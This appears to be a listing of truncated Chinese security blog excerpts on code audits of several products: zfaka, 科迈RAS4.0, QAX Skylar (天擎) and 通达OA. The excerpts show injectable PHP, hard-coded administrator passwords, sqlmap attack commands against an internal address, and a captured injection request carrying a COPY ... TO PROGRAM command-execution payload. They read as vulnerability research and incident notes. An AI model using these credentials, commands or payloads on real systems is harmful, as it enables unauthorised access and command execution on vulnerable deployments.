代码审计

zfaka在安装的时候会新建一个测试帐号[email protected]，密码123456 在文件application/modules/Member/controllers/Profiles.php，profilesajaxAction方法第53行附近存在注入 public function profilesajaxAction() { if ($this->login==FALSE AND !$this->userid) { $data = array('code' => 1000, 'msg' => '请登录'); Helper::response($data); } $nickname = $this->getPost('nickname',false); $qq = $this->getPost('qq',false); $tag = $this-> ...

应急时碰到的一套系统，简单记录下 0x01 硬编码问题科迈RAS4.0在安装时会创建2个管理员账户RAS_admin、RASCOM，这两个账户硬编码了2组密码， 账户名 密码 RASCOM 1A2b3C4d56. RAS_admin R1a2b3c4d56. 这就导致如果机器开了RDP，那么可以通过这两组帐密直接登录 0x02 SQL注入问题审计的时候发现这套源码通过COM组件形式调用的SQL语句，IDA里看到均为直接拼接，没有做过滤 Server/CmxCheckBind.php python3 sqlmap.py -u "http://10.100.100.133:8088/Server/CmxCheckBind.php?a=1&b=2&c=3&d=4&from=5" --level 5 --risk 3 Server/CmxBindMachine.php python3 sqlmap.py -u "http://10.100.100.133:8088/Server/Cmx ...

SQL注入文件inter/update_software_info.php <?php//客户端显示数据require_once "./use_db.php";require_once "./common/functions.php";$return=array();$return["nResult"] =0;$where='where 1=1';if (!is_null($_POST['type']) and $_POST['type'] !="") { $id=$_POST['type']; $where .=" and type=$id ";}if (!is_null($_POST['key'])) { $keyname=$_POST['key']; $where .=" and keyname ...

SQL注入inter/handler_get_set_data/set_sc_count_online_setup_data_cmd.php 函数set_sc_count_online_setup_data_cmd function set_sc_count_online_setup_data_cmd($para) { global $logHandler, $mysqlDB;// $logHandler->LogError('set_sc_count_online_setup_data_cmd'); $keyData = array("client","server","scid"); $check = checkParam($keyData,$para,$logHandler); if ($check !== true) return false; $SCID= $para['scid']; $data_type=' ...

在某大型活动中捕获到了天擎（QAX Skylar）的几个0day，跟代码审了下 0x01 第一类活动期间在WAF上拦截到一枚注入，数据包如下 POST /api/upload_client_conf.json?mid=马赛克 HTTP/1.1Host: 马赛克User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: keep-aliveContent-Length: 128Content-Type: application/json{"summary": {"0": {"nickname": "cpu='1';CopY(sElEct 1)TO pRogRAM 'e ...

学习审计通达OA时发现的一些有意思的事 全局变量覆盖审计时发现前辈们提到了这个问题，跟了下存在问题的文件 比如存在变量覆盖的文件是pda\vote\list.php， require_once "pda/auth.php";include_once "inc/conn.php";include_once "inc/utility_all.php";include_once "mobile/api/qyapp.vote.class.php";if ($P == "") { $P = $_COOKIE["PHPSESSID"];}else { $P = $_GET["P"];} 这里包含了inc/conn.php数据库连接文件 继续跟，发现包含了inc/td_config.php <?phpinclude_once "inc/common.inc.php";$ROOT_PATH ...